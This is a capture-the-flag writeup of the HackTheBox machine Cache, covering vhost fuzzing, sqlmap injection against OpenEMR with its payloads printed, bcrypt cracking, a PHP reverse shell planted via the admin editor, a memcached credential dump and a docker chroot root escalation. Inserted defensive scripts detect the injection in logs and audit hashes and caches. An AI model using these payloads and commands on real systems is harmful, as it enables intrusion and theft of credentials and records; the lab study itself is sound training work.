HackTheBox Cache Writeup – 10.10.10.188

Hello, welcome back. Here is my new article in the HackTheBox Writeup Series, on the new Linux box Cache (10.10.10.188) by ASHacker. It is a medium-difficulty machine that requires a good amount of enumeration for the foothold and a bit of guessing or fuzzing.

Difficulty: Medium

Points: 30

Machine Maker: ASHacker

NMAP Scanning

As always, add the machine IP 10.10.10.188 to /etc/hosts and proceed to nmap scanning.

$ nmap -sC -sV -p- cache.htb                     
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-10 13:17 +03
Nmap scan report for cache.htb (10.10.10.188)
Host is up (0.14s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a9:2d:b2:a0:c4:57:e7:7c:35:2d:45:4d:db:80:8c:f1 (RSA)
|   256 bc:e4:16:3d:2a:59:a1:3a:6a:09:28:dd:36:10:38:08 (ECDSA)
|_  256 57:d5:47:ee:07:ca:3a:c0:fd:9b:a8:7f:6b:4c:9d:7c (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Cache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1175.60 seconds

# root @ ns09 in ~/htb/cache [13:37:17] 

We found SSH (port 22) and HTTP (port 80) open. Visiting the web server shows the following website.


Accessing the Login Page

There is a login page. I tried to log in using common passwords, but failed with the error message “Password didn’t Match”.

I went on to enumerate the backend. There is not much there, but I noticed that the error message “Password didn’t Match” does not seem to come from this page, and I could not see where the login action was being sent. Also, the page looked like an iframe page. So there is something inside the back end of the back end.

Let us see what the source code of the login.html page looks like:

I noticed the password field referencing a value “FakePSW” that is not defined anywhere, and a jQuery script “functionality.js” being loaded as well. So I proceeded to check it, and here we have the credentials we are looking for.

Credentials

ash:H@v3_fun

We managed to log in using the credentials we just found, but the page is an under-construction page with an image. A reverse image lookup says the image is Portgas D. Ace from the One Piece series. Our instinct says this picture has something to do with the later stages.

Finding New Domain By Guessing 😉

I was stuck at this point for a while and realized this could be a rabbit hole, so I started to enumerate the website. The Author’s page has his profile and a short description of his projects. I noticed that the author is working on two projects, Cache and HMS (Hospital Management System).

The author’s first project is cache.htb, so could the other project be hms.htb? I immediately updated my hosts file with hms.htb and accessed the page, and to my surprise I had the “OpenEMR” login page in front of me.

Note: I honestly admit that I didn’t use WFUZZ like most users did; in my case it was mere guesswork.

Finding New Domain By Intended Way

But I wasn’t convinced. I saw that a lot of people found the second domain name the intended way, so I wanted to use that method as well. I asked for a nudge from a Discord friend, and he suggested using CeWL to gather a custom wordlist from the website cache.htb and then fuzzing the Host header with WFUZZ.

# root @ ns09 in ~/htb/cache
$ cewl -w list http://cache.htb/                                                  

FUZZING:

# root @ ns09 in ~/htb/cache [19:53:33] 
$ wfuzz -w list -H 'Host: FUZZ.htb' -u http://10.10.10.188/ --hc 400,200 --hh 1234
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /usr/lib/python3/dist-packages/wfuzz/plugins/payloads/bing.py Exception, msg=No module named 'shodan'
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /usr/lib/python3/dist-packages/wfuzz/plugins/payloads/shodanp.py Exception, msg=No module named 'shodan'
********************************************************
* Wfuzz 2.4 - The Web Fuzzer                           *
********************************************************
Target: http://10.10.10.188/
Total requests: 609
===================================================================
ID           Response   Lines    Word     Chars       Payload                                                               
===================================================================
000000606:   302        0 L      0 W      0 Ch        "HMS"                                                                 
Total time: 10.07316
Processed Requests: 609
Filtered Requests: 608
Requests/sec.: 60.45767

So here it is: HMS.HTB

Exploiting OpenEMR – Electronic Medical Record and Practice Management Software

Having found the new domain and the application running on it, the next step is to find a vulnerability and exploit it. The exploit I found on ExploitDB was not that helpful, so I thought of trying another PoC from YouTube.

Patient Portal Access Page

Confirming that error-based SQLi is possible.

Using BurpSuite

I captured the request to “portal/add_edit_event_user.php?eid=1'” and copied it into a file called request.

GET /portal/add_edit_event_user.php?eid=1 HTTP/1.1
Host: hms.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=br7hdmh5qrk3k88pmid56tjnir; OpenEMR=78s755ehenddjrqa8pev8dbvi4
Connection: close
Upgrade-Insecure-Requests: 1

SQLMAP

Once the request file was ready, I opened my terminal and set sqlmap on the task to get the database names.

# root @ ns09 in ~/htb/cache [13:27:59] 
$ sqlmap -r request --dbs --threads=10
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.4.3#stable}
|_ -| . [,]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 13:28:08 /2020-05-10/

[13:28:08] [INFO] parsing HTTP request from 'request'
[13:28:08] [INFO] testing connection to the target URL
[13:28:09] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
[13:28:09] [INFO] checking if the target is protected by some kind of WAF/IPS
[13:28:10] [INFO] testing if the target URL content is stable
[13:28:13] [INFO] target URL content is stable
[13:28:13] [INFO] testing if GET parameter 'eid' is dynamic
[13:28:15] [WARNING] GET parameter 'eid' does not appear to be dynamic
-----snip---------
[13:28:51] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[13:28:56] [INFO] GET parameter 'eid' appears to be 'Boolean-based blind - Parameter replace (original value)' injectable (with --not-string="row")
[13:28:56] [INFO] testing 'Generic inline queries'
[13:28:58] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[13:29:01] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[13:29:02] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[13:29:03] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[13:29:05] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
-----snip----------
[13:29:13] [INFO] GET parameter 'eid' is 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)' injectable 
[13:29:13] [INFO] testing 'MySQL inline queries'
[13:29:14] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[13:29:14] [WARNING] time-based comparison requires larger statistical model, please wait... (done)                                                                       
[13:29:18] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[13:29:19] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
[13:33:32] [WARNING] if UNION based SQL injection is not detected, please consider forcing the back-end DBMS (e.g. '--dbms=mysql') 
---------snip------------
[13:34:14] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
GET parameter 'eid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 330 HTTP(s) requests:
---
Parameter: eid (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: eid=(SELECT (CASE WHEN (4761=4761) THEN 1 ELSE (SELECT 2592 UNION SELECT 7410) END))

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: eid=1 AND EXTRACTVALUE(7392,CONCAT(0x5c,0x716a6a7671,(SELECT (ELT(7392=7392,1))),0x716a717671))
---
[13:35:27] [INFO] the back-end DBMS is MySQL
[13:35:27] [CRITICAL] unable to connect to the target URL. sqlmap is going to retry the request(s)
[13:35:27] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')
[13:35:29] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
back-end DBMS: MySQL >= 5.1
[13:35:29] [INFO] fetching database names
[13:35:29] [INFO] starting 2 threads
[13:35:30] [INFO] retrieved: 'information_schema'
[13:35:30] [INFO] retrieved: 'openemr'
available databases [2]:
[*] information_schema
[*] openemr

[13:35:30] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 40 times
[13:35:30] [INFO] fetched data logged to text files under '/root/.sqlmap/output/hms.htb'
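From the defender’s side, the two injection payloads sqlmap reported above (and the initial `eid=1'` probe) leave distinctive traces in the web server’s access log, and the run also produced 40 HTTP 500 responses. The following script is an added example and not part of the original writeup or of OpenEMR: it parses Apache combined-format log lines, percent-decodes every query-string value, and flags values that contain error-based functions, UNION SELECT, CASE WHEN, a self-comparison such as 4761=4761, or a stray quote. The log lines are constructed for the example (same path and payloads as in the writeup, invented client IPs and sizes); the indicator list is a minimal illustration, not a complete SQLi signature set. Note that a User-Agent rule would not have helped here, because sqlmap was fed the request file with `-r` and therefore replayed the browser’s own Firefox User-Agent.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed Apache combined-format access log (NOT captured from the box).
# The eid values reproduce the payloads sqlmap reported in the writeup,
# percent-encoded the way a client sends them on the wire.
SAMPLE_LOG = '''
10.10.14.2 - - [10/May/2020:13:27:30 +0300] "GET /portal/add_edit_event_user.php?eid=1 HTTP/1.1" 200 4821 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
10.10.14.2 - - [10/May/2020:13:27:41 +0300] "GET /portal/add_edit_event_user.php?eid=1%27 HTTP/1.1" 500 1234 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
10.10.14.2 - - [10/May/2020:13:28:55 +0300] "GET /portal/add_edit_event_user.php?eid=%28SELECT%20%28CASE%20WHEN%20%284761%3D4761%29%20THEN%201%20ELSE%20%28SELECT%202592%20UNION%20SELECT%207410%29%20END%29%29 HTTP/1.1" 200 4821 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
10.10.14.2 - - [10/May/2020:13:29:13 +0300] "GET /portal/add_edit_event_user.php?eid=1%20AND%20EXTRACTVALUE%287392%2CCONCAT%280x5c%2C0x716a6a7671%2C%28SELECT%20%28ELT%287392%3D7392%2C1%29%29%29%2C0x716a717671%29%29 HTTP/1.1" 500 1311 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
10.10.14.3 - - [10/May/2020:13:30:02 +0300] "GET /portal/index.php HTTP/1.1" 200 6120 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0"
'''

# Apache "combined" format: ip ident user [time] "method target proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]+" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Indicators matched against the DECODED value of each query parameter.
INDICATORS = {
    "error-based function": re.compile(r"\b(EXTRACTVALUE|UPDATEXML)\s*\(", re.I),
    "union select": re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I),
    "conditional expression": re.compile(r"\bCASE\s+WHEN\b", re.I),
    "self-comparison": re.compile(r"\b(\d+)\s*=\s*\1\b"),   # e.g. 4761=4761
    "stray quote": re.compile(r"'"),
}


def analyse(log_text):
    """Parse each line, decode its query string and return (findings, status_counts).

    One finding is recorded per parameter value that matches at least one
    indicator; status_counts maps HTTP status code -> number of responses."""
    findings, status_counts = [], {}
    for raw in log_text.strip().splitlines():
        m = LOG_RE.match(raw)
        if not m:
            continue  # skip malformed lines rather than abort the whole run
        status = int(m["status"])
        status_counts[status] = status_counts.get(status, 0) + 1
        url = urlsplit(m["target"])
        # parse_qsl splits on '&' and '=' first, then percent-decodes each
        # value, so '%27' becomes "'" and '%3D' inside a value becomes '='.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            hits = [label for label, rx in INDICATORS.items() if rx.search(value)]
            if hits:
                findings.append({"ip": m["ip"], "path": url.path, "param": name,
                                 "value": value, "indicators": hits, "status": status})
    return findings, status_counts


def error_ratio(status_counts):
    """Share of responses that were 5xx; an automated injection run pushes this
    up sharply (the writeup's sqlmap session produced 40 HTTP 500s)."""
    total = sum(status_counts.values())
    errors = sum(n for code, n in status_counts.items() if code >= 500)
    return errors / total if total else 0.0


if __name__ == "__main__":
    found, counts = analyse(SAMPLE_LOG)
    for f in found:
        print(f'{f["ip"]} {f["path"]} {f["param"]}: {", ".join(f["indicators"])} (HTTP {f["status"]})')
    print(f"5xx ratio: {error_ratio(counts):.2f}")
```

Running it flags the three `eid` requests and reports a 5xx ratio of 0.40 for the sample; in practice the per-client error ratio and the indicator hits would be computed over a sliding time window and correlated with the application’s own DBMS error logging.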

I found the database name “openemr”; now it’s time to gather table and user names. sqlmap returned around 234 tables; what I’m interested in is the user tables.

So I decided to dump the user tables one by one until I got the right one. The table users_secure has the right user in it, and I have the salted credentials for the user openemr_admin:

[20:43:42] [INFO] retrieved: '$2a$05$l2sTLIG6GTBeyBf7TAKL6A$'
[20:43:42] [INFO] retrieved: ' '
[20:43:42] [INFO] retrieved: ' '
[20:43:42] [INFO] retrieved: 'openemr_admin'
Database: openemr
Table: users_secure
[1 entry]
+------+--------------------------------+---------------+--------------------------------------------------------------+---------------------+---------------+---------------+-------------------+-------------------+
| id   | salt                           | username      | password                                                     | last_update         | salt_history1 | salt_history2 | password_history1 | password_history2 |
+------+--------------------------------+---------------+--------------------------------------------------------------+---------------------+---------------+---------------+-------------------+-------------------+
| 1    | $2a$05$l2sTLIG6GTBeyBf7TAKL6A$ | openemr_admin | $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. | 2019-11-21 06:38:40 | NULL          | NULL          | NULL              | NULL              |
+------+--------------------------------+---------------+--------------------------------------------------------------+---------------------+---------------+---------------+-------------------+-------------------+

Cracking The Hash using John

I copied the hash $2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B. into a file and used john to crack it. John took a couple of seconds to crack the hash, as the password is xxxxxx.

# root @ ns09 in ~/htb/cache [13:46:30] 
$ john hash --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 32 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
xxxxxx           (?)
1g 0:00:00:01 DONE (2020-05-10 13:46) 0.7042g/s 595.7p/s 595.7c/s 595.7C/s tristan..princesita
Use the "--show" option to display all of the cracked passwords reliably
Session completed
# root @ ns09 in ~/htb/cache [13:46:43] 
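Why did john need only a couple of seconds? The answer is in the hash string itself: `$2a$05$` means bcrypt with cost 5, i.e. 2^5 = 32 iterations, which is exactly the “Cost 1 (iteration count) is 32” that john printed. The script below is an added example, not part of the writeup or of OpenEMR: it parses the modular-crypt bcrypt format, derives the iteration count, flags a low cost, and checks that the salt stored in the users_secure.salt column is the one embedded in the hash. The dumped row shows the salt column ending in `6A$` while the hash’s salt ends in `6.`; the check explains why those are the same salt (a 22-character bcrypt salt encodes 132 bits of which only 128 are used, so the low four bits of the last character are padding). The cost threshold of 10 is an assumption chosen for the example, not an OpenEMR or john setting.

```python
import re

# bcrypt uses its own base64 alphabet; this ordering differs from RFC 4648.
BCRYPT_B64 = "./ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"

# $<version>$<cost>$<22-char salt><31-char digest>  (60 characters in total)
BCRYPT_RE = re.compile(
    r"^\$(?P<version>2[abxy]?)\$(?P<cost>\d{2})\$"
    r"(?P<salt>[./A-Za-z0-9]{22})(?P<digest>[./A-Za-z0-9]{31})$"
)
# OpenEMR's users_secure.salt column (as seen in the dumped row) holds the
# prefix and salt followed by a trailing '$'.
SALT_COLUMN_RE = re.compile(r"^\$2[abxy]?\$\d{2}\$(?P<salt>[./A-Za-z0-9]{22})\$?$")

# Assumed policy threshold for this example: treat cost < 10 as weak.
MIN_ACCEPTABLE_COST = 10


def parse_bcrypt(hash_str):
    """Split a bcrypt string into version, cost, iterations (2**cost), salt and digest."""
    m = BCRYPT_RE.match(hash_str)
    if not m:
        raise ValueError("not a bcrypt hash")
    cost = int(m["cost"])
    return {
        "version": m["version"],
        "cost": cost,
        "iterations": 2 ** cost,
        "salt": m["salt"],
        "digest": m["digest"],
        "weak": cost < MIN_ACCEPTABLE_COST,
    }


def salt_bits(salt22):
    """Decode a 22-char bcrypt salt into its 128 significant bits.

    22 characters carry 132 bits; the low 4 bits of the last character are
    padding, so encodings that differ only there denote the same salt."""
    value = 0
    for ch in salt22:
        value = (value << 6) | BCRYPT_B64.index(ch)
    return value >> 4


def stored_salt_matches(salt_column, hash_str):
    """True if the salt recorded separately in the database is the salt inside the hash."""
    m = SALT_COLUMN_RE.match(salt_column)
    if not m:
        raise ValueError("unexpected salt column format")
    return salt_bits(m["salt"]) == salt_bits(parse_bcrypt(hash_str)["salt"])


if __name__ == "__main__":
    # Values from the dumped users_secure row in the writeup.
    stored_salt = "$2a$05$l2sTLIG6GTBeyBf7TAKL6A$"
    stored_hash = "$2a$05$l2sTLIG6GTBeyBf7TAKL6.ttEwJDmxs9bI6LXqlfCpEcY6VF6P0B."
    info = parse_bcrypt(stored_hash)
    print(f"bcrypt {info['version']} cost={info['cost']} -> {info['iterations']} iterations"
          f" ({'WEAK' if info['weak'] else 'ok'})")
    print("salt column matches hash salt:", stored_salt_matches(stored_salt, stored_hash))
```

For a hash like this one, the output reports 32 iterations and flags the cost as weak, which is why a rockyou.txt run finishes in seconds; raising the cost factor is the operator-side fix, and the salt check is a cheap integrity test to run over an exported user table.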

Logging In to the OpenEMR System

The OpenEMR system administrator has an option to edit files under the “Administration” menu. Whatever I put into the default file updates the statement.inc.php file.

PHP Reverse Shell

I copied the good old PHP reverse shell script from GitHub, updated the required fields, and saved it over the top of statement.inc.php.

File Location:

I started my listener on port 9999 and, once everything was set up, executed the file by just visiting the link hms.htb/sites/default/statement.inc.php. My listener received the connection, and I had a reverse shell as www-data.

After getting the shell, I proceeded to go for user first. There are two users on the box, Ash and Luffy. I wasn’t able to access Luffy’s home directory, only Ash’s. Ash has user.txt in his directory; however, www-data cannot read it.

Through further enumeration I learned that Memcached is running. As I had recently done a few HTB machines involving Memcached, I immediately jumped on it.

According to the status, Memcached is running on port 11211. I can now easily connect to the service and dump data. First I connected to the server on port 11211 using telnet and dumped the item statistics:

$ telnet 127.0.0.1 11211
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
stats items
STAT items:1:number 5
STAT items:1:number_hot 0
STAT items:1:number_warm 0
STAT items:1:number_cold 5
STAT items:1:age_hot 0
STAT items:1:age_warm 0
STAT items:1:age 20
STAT items:1:evicted 0
STAT items:1:evicted_nonzero 0
STAT items:1:evicted_time 0
STAT items:1:outofmemory 0
STAT items:1:tailrepairs 0
STAT items:1:reclaimed 0
STAT items:1:expired_unfetched 0
STAT items:1:evicted_unfetched 0
STAT items:1:evicted_active 0
STAT items:1:crawler_reclaimed 0
STAT items:1:crawler_items_checked 44
STAT items:1:lrutail_reflocked 0
STAT items:1:moves_to_cold 350
STAT items:1:moves_to_warm 0
STAT items:1:moves_within_lru 0
STAT items:1:direct_reclaims 0
STAT items:1:hits_to_hot 0
STAT items:1:hits_to_warm 0
STAT items:1:hits_to_cold 0
STAT items:1:hits_to_temp 0
END

From the stats I noticed that only a few cached items hold data, so I read the cache:

stats cachedump 1 100
ITEM link [21 b; 0 s]
ITEM user [5 b; 0 s]
ITEM passwd [9 b; 0 s]
ITEM file [7 b; 0 s]
ITEM account [9 b; 0 s]
END
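The memcached text protocol has no authentication, so any local process that can reach port 11211 can walk the cache exactly as shown above; the operator-side question is whether anything sensitive is sitting in it. The script below is an added example, not part of the writeup or of memcached itself: it parses the two replies quoted above (`stats items` and `stats cachedump`), reports which slab classes hold items, and flags keys whose names look like credentials or that carry no expiry (in cachedump output the second number is the absolute expiry time, and 0 means the item never expires). The reply text is a constructed copy of the writeup’s output (trimmed for the `stats items` part), and the list of sensitive-looking name fragments is an assumption for the example.

```python
import re

# Constructed copies of the memcached replies shown in the writeup.
STATS_ITEMS = """STAT items:1:number 5
STAT items:1:number_hot 0
STAT items:1:number_warm 0
STAT items:1:number_cold 5
STAT items:1:age 20
STAT items:1:evicted 0
STAT items:1:crawler_items_checked 44
END"""

CACHEDUMP = """ITEM link [21 b; 0 s]
ITEM user [5 b; 0 s]
ITEM passwd [9 b; 0 s]
ITEM file [7 b; 0 s]
ITEM account [9 b; 0 s]
END"""

# Assumed list of name fragments that usually mean "secret material".
SENSITIVE_KEY = re.compile(r"(pass|pwd|secret|token|session|key|account|cred|user)", re.I)

STAT_LINE = re.compile(r"^STAT items:(\d+):(\w+) (-?\d+)$")
ITEM_LINE = re.compile(r"^ITEM (\S+) \[(\d+) b; (\d+) s\]$")


def parse_stats_items(text):
    """Return {slab_id: {stat_name: value}} from a 'stats items' reply."""
    slabs = {}
    for line in text.splitlines():
        m = STAT_LINE.match(line.strip())
        if m:
            slabs.setdefault(int(m[1]), {})[m[2]] = int(m[3])
    return slabs


def parse_cachedump(text):
    """Return [(key, size_bytes, expiry)] from a 'stats cachedump' reply.

    expiry is the absolute expiry timestamp; 0 means the item never expires."""
    items = []
    for line in text.splitlines():
        m = ITEM_LINE.match(line.strip())
        if m:
            items.append((m[1], int(m[2]), int(m[3])))
    return items


def audit(stats_text, dump_text):
    """Combine both replies into an audit summary.

    findings maps key -> list of reasons it was flagged."""
    slabs = parse_stats_items(stats_text)
    items = parse_cachedump(dump_text)
    findings = {}
    for key, _size, expiry in items:
        reasons = []
        if SENSITIVE_KEY.search(key):
            reasons.append("sensitive-looking key name")
        if expiry == 0:
            reasons.append("no expiry")
        if reasons:
            findings[key] = reasons
    populated = sorted(sid for sid, stats in slabs.items() if stats.get("number", 0) > 0)
    return {"populated_slabs": populated, "items": len(items), "findings": findings}


if __name__ == "__main__":
    report = audit(STATS_ITEMS, CACHEDUMP)
    print("slabs with items:", report["populated_slabs"], "| items:", report["items"])
    for key, reasons in report["findings"].items():
        print(f"  {key}: {', '.join(reasons)}")
```

On the sample it reports slab 1 with five items, flags `user`, `passwd` and `account` by name, and flags all five for never expiring. The practical fixes are on the application side (do not cache credentials, set an expiry on what is cached) and on the host side (keep memcached bound to localhost and restrict which local users can reach it).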

User:

Password:

SSH Using Luffy’s Credentials

I now have the user Luffy’s credentials. I will try to SSH into the box and see if it works.

Once logged in, I tried to grab user.txt from Ash’s directory, but still got permission denied. 🙁

Docker To Root

A couple of days ago I owned a machine on TryHackMe using a similar approach, and a couple of previous HTB machines were built the same way. There is a nice article that shows how it works. First I should make sure that an Ubuntu docker image is available.

If you want to understand how it works, read the following articles:

Getting User and Root Together

I ran “docker run -v /:/mnt --rm -it ubuntu chroot /mnt bash” and I’m root. The funny part was that, although I got root, my flags were not accepted; I got an error saying “Incorrect hash for Cache”, but I reset the box and got a working flag immediately.

That’s all for today. Thanks for visiting and reading, guys.


Navin

Hey there, I'm Navin, a passionate Info-Sec enthusiast from Bahrain. I started this blog to share my knowledge. I usually write on HackTheBox machines and challenges, cybersecurity-related articles and bug bounty. If you are an HTB user and like my articles, please give respect here: Profile: https://www.hackthebox.eu/nav1n

4 Comments
cosmic
5 months ago

DailyBugle on THM did not use a Docker privesc

Willy
4 months ago

Hello there

From luffy you can go to ash through the credentials obtained before

luffy@cache:~$ su - ash
Password: H@v3_fun
ash@cache:~$ whoami
ash
ash@cache:~$ id
uid=1000(ash) gid=1000(ash) groups=1000(ash)

The point is, as you can see, ash isn't in the docker group. So it's needed to return to luffy for the privilege escalation. Anyway, I like your way, because it's two in a row =p hehehe

Greetings!

Last edited 4 months ago by Willy